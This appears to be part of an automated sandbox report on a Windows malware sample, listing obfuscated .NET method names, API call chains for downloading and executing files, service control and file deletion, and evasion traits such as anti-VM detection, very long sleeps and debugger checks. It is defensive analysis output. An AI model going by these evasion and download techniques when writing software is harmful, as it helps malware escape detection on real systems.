                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.51a0000.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.37d0e28.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CBE1
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00457186 push ecx; ret 3_2_00457199
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041C7F3 push eax; retf 3_2_0041C7FD
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00457AA8 push eax; ret 3_2_00457AC6
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00434EB6 push ecx; ret 3_2_00434EC9
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: section name: .text entropy: 7.838238330749531
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.csHigh entropy of concatenated method names: 'KwAmenCN9k', 'fOGm8WAJKd', 'MZmmDC9WG5', 'LcKmkskJyH', 'R7VmKjcwk5', 'LTcmbNPqlJ', 'yq8mx46krj', 'XtVmVpSxIN', 'ynnmfEr0bW', 'muNm94rsEh'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, FmA2iaoKSyOClB00cR.csHigh entropy of concatenated method names: 'Dispose', 'GQ4IlnpuhZ', 'wWAT7WEhYe', 'vHZooMe5f5', 'YcwIcxAi8l', 'euJIzlilOl', 'ProcessDialogKey', 'NX9TA1YHpO', 'BRLTI7TFqy', 'rdiTTj5cl9'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, S8S0S3jqgBRL6UwDkdt.csHigh entropy of concatenated method names: 'edWCEcYMQU', 'PrxCWjCgLb', 'oYVCYDwxi5', 'u5OCMo78KM', 'NdFCpus2Ii', 'txmChquoMx', 'KrXCHJRWUO', 'Yw4C5Vbk9F', 'h9ZC6fKaiH', 'DbsC2hwQAn'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, Hb2FV72DDRoi9CPivd.csHigh entropy of concatenated method names: 'AixKplDluv', 'w8wKHDg0Le', 'xWJkJZrjnd', 'r2MkN3joCS', 'dULkwYytgc', 'DIrkGcqEx7', 'ID8kjGJAr8', 'hEZkOxe9iK', 'xf0kydlqjM', 'XlxknqTrFR'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, HU8MEIZHHa9c0pqIir.csHigh entropy of concatenated method names: 'QYybeAOcLX', 'VGDbDF9t1L', 'ILbbKtSAc4', 'mjHbxDxwfD', 'e91bVpaKLq', 'NVvKXifVXB', 'DDNK0ADRLd', 'McOKL0dYAj', 'yuwK4pyDuc', 'QYAKlDQjWS'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, T5g3cuESsMopB158wk.csHigh entropy of concatenated method names: 'QiAQ5IANfW', 'bBLQ6ELBQO', 'br0Q1TXKNO', 'WaBQ7QoPqQ', 'v9WQNCFA5C', 'XUTQwJT9xP', 'WAxQjIMiYg', 'rB5QOg2lQO', 'JtWQnhL9Rx', 'LA9QP4Bp6R'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, WZxX4vjFUp1Vg7W0p0b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IGZZue0gJ2', 'ortZrIHMJK', 'gwZZqMcJut', 'MWlZSIeRFN', 'GJMZXWsuuN', 'igoZ0GCmty', 'fmWZLsF5HI'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, Y3GgxCR1JGw1AVHmps.csHigh entropy of concatenated method names: 'iU2U8j0fBp', 'Y3jUDX6pKD', 'IZhUk4LYPZ', 'DjrUKj7kYI', 'pI6UbikN4U', 'ICMUx31pdf', 'HwDUVcEJFh', 'mW2UfaGs6c', 'SyDU9s0o71', 'jN5UsswbSZ'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, CZCrAI4AjcRGd5YCvg.csHigh entropy of concatenated method names: 'QojxEqZ0yT', 'HjAxWvVlhL', 'ccvxYZ6hm2', 'tNsxMtWZTa', 'WqTxpTfTMP', 'LuJxhFJdfs', 'bJwxHXlghp', 'BWrx5aTXgf', 'bRox6adpCC', 'wCMx2hVkmj'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, nb3pEF8erS6YBTOUO8.csHigh entropy of concatenated method names: 'A0GFnkBGBG', 'sAdFvBEQqe', 'I5GFumo0xt', 'KfGFrJaERk', 'a25F7w6f6E', 'U2cFJ7C6UH', 'LnjFNyAOL0', 'DasFwpTOG7', 'iQgFGKliih', 'fCFFjXJkuL'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, tWn2UPi7xAXuAbxNPP.csHigh entropy of concatenated method names: 'MSot4C0jGZ', 'TgdtcCOJtB', 'ueRUAFflXA', 'vTIUI0n9PR', 'voitPfwbtJ', 'AhHtvCujvY', 'ykvtaPaXpS', 'mJwtu8hDw9', 'mMbtr8HOh1', 'tAjtqtSLix'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, rsjbrOx6pQ72IEhA1F.csHigh entropy of concatenated method names: 'SrtU1RUm5p', 'fYpU753KaD', 'LIDUJkFJGN', 'KX9UN5kL6B', 'QZUUuOUHfs', 'r7EUwHh3mf', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, xEOAeNDTubN0HW45AU.csHigh entropy of concatenated method names: 'ToString', 'xZ9dPI4ri8', 'q5Ud7NUB7X', 'CaodJQLnBG', 'eDsdNcRA6f', 'lVpdwyTUIl', 'bD6dGNMXqc', 'Rg6dj16RPX', 'VM2dOxiJrS', 'jO3dygJEd3'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, rYVqfWU3FePsUOK5NV.csHigh entropy of concatenated method names: 'YK3IxVNC01', 'aaoIVrU7mf', 'wvvI9BnecT', 'csSIsZpZng', 'gfTIF8KwMn', 'oZTId5aGdM', 'aQPp6VbpWv0nnMRGBY', 'YtvPaU1buwL4ldCcN5', 'CxdII1HmEa', 'qhKImvHTXU'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, kjNTPYL1gOM9ugW9Oh.csHigh entropy of concatenated method names: 'gvWx843bHh', 'HFhxk0QEoD', 'CUTxbfkgWT', 'oYYbcAfieJ', 'LeObzpm4oW', 'I54xATr7PE', 'mZ3xI5eBbp', 'lRfxTIPGWa', 'lKuxmdmch0', 'qJJxB0lHai'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, xMa3F2j7E8i4u6CtLL3.csHigh entropy of concatenated method names: 'HxRZEpy2rB', 'YMGZWwPFVF', 'SrxZYUBunV', 'eGshTmYb8uGjlfyLa9d', 'OCOpvsY1csFDgDWpIPN', 'O57d7PYE16SUiQKkKKn'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, d68QmCbgVnawm6LGVN.csHigh entropy of concatenated method names: 'JTUDu7gqU4', 'FwGDr06LG0', 'EHbDq6VjxL', 'NrmDSVZjoM', 'IS0DXhMphj', 'XbLD0g43vi', 'qAyDLhxoTH', 'SU3D4MISZ2', 'jg1DlnU8kk', 'zSYDcM3MsJ'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, yocuev7bZEAwKZtXyr.csHigh entropy of concatenated method names: 'IxiY4i8qv', 'dnOM0IV9X', 'EaLhhR1Sy', 'CS5HbxkFh', 'xy76s39gx', 'uEN2WwlEk', 'etZJA5lcNhDjNUpUqP', 'qmbEom5uQR5UlxE8QA', 'RDbUSxxH2', 'MbPZyWvMx'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, ncgxWpVdyYVxS9q32n.csHigh entropy of concatenated method names: 'H9tkMrBrfb', 'HDFkhZGOV1', 'pBwk5jKDPH', 'Dp7k64A7AF', 'rvpkF6D2WV', 'v8QkdKAc3R', 'sHdkt5fF1A', 'VyFkUVJ9Ev', 'L0ykCyv63K', 'ICSkZ1wGr4'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, QyaYlnzfG1oLNxy13k.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BQsCQGyLMe', 'wpgCFBRvNp', 'mZDCd6M3hV', 'Am8Ctaam2v', 'fEICU6SyOZ', 'JRSCCqOgk9', 'w92CZijvCR'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, n7fBrTOnjSVsbZtnSb.csHigh entropy of concatenated method names: 'wgcCIbAt2o', 'vcmCmqU232', 'FKVCBav4En', 'vKjC8dp9ws', 'ueoCDwrKWy', 'hY4CKQarEh', 'QS0CbXQZvq', 'r0oUL7VduL', 'wg7U4D0UDj', 'GH5UlTMY1p'
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00406EEB ShellExecuteW,URLDownloadToFileW,3_2_00406EEB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AADB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CBE1
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Delayed program exit found
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040F7E2 Sleep,ExitProcess,3_2_0040F7E2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 75F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 85F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 87A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 97A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: 9EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: AEC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: BEC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0041A7D9
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeWindow / User API: threadDelayed 3191Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeWindow / User API: threadDelayed 6756Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 5480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180Thread sleep count: 3191 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180Thread sleep time: -9573000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180Thread sleep count: 6756 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180Thread sleep time: -20268000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0040928E
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C322
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C388
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_004096A0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_00408847
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00407877 FindFirstFileW,FindNextFileW,3_2_00407877
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB6B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419B86
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD72
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407CD2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.000000000120A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.000000000120A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeAPI call chain: ExitProcess graph end nodegraph_3-48218
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00434A8A
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CBE1
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00443355 mov eax, dword ptr fs:[00000030h]3_2_00443355
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004120B2 GetProcessHeap,HeapFree,3_2_004120B2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0043503C
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00434A8A
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043BB71
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00434BD8 SetUnhandledExceptionFilter,3_2_00434BD8
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_00412132
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00419662 mouse_event,3_2_00419662
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"Jump to behavior
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00434CB6 cpuid 3_2_00434CB6
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetLocaleInfoA,3_2_0040F90C
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: EnumSystemLocalesW,3_2_0045201B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: EnumSystemLocalesW,3_2_004520B6
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00452143
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetLocaleInfoW,3_2_00452393
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: EnumSystemLocalesW,3_2_00448484
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004524BC
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetLocaleInfoW,3_2_004525C3
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452690
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: GetLocaleInfoW,3_2_0044896D
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451D58
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: EnumSystemLocalesW,3_2_00451FD0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe VolumeInformationJump to behavior
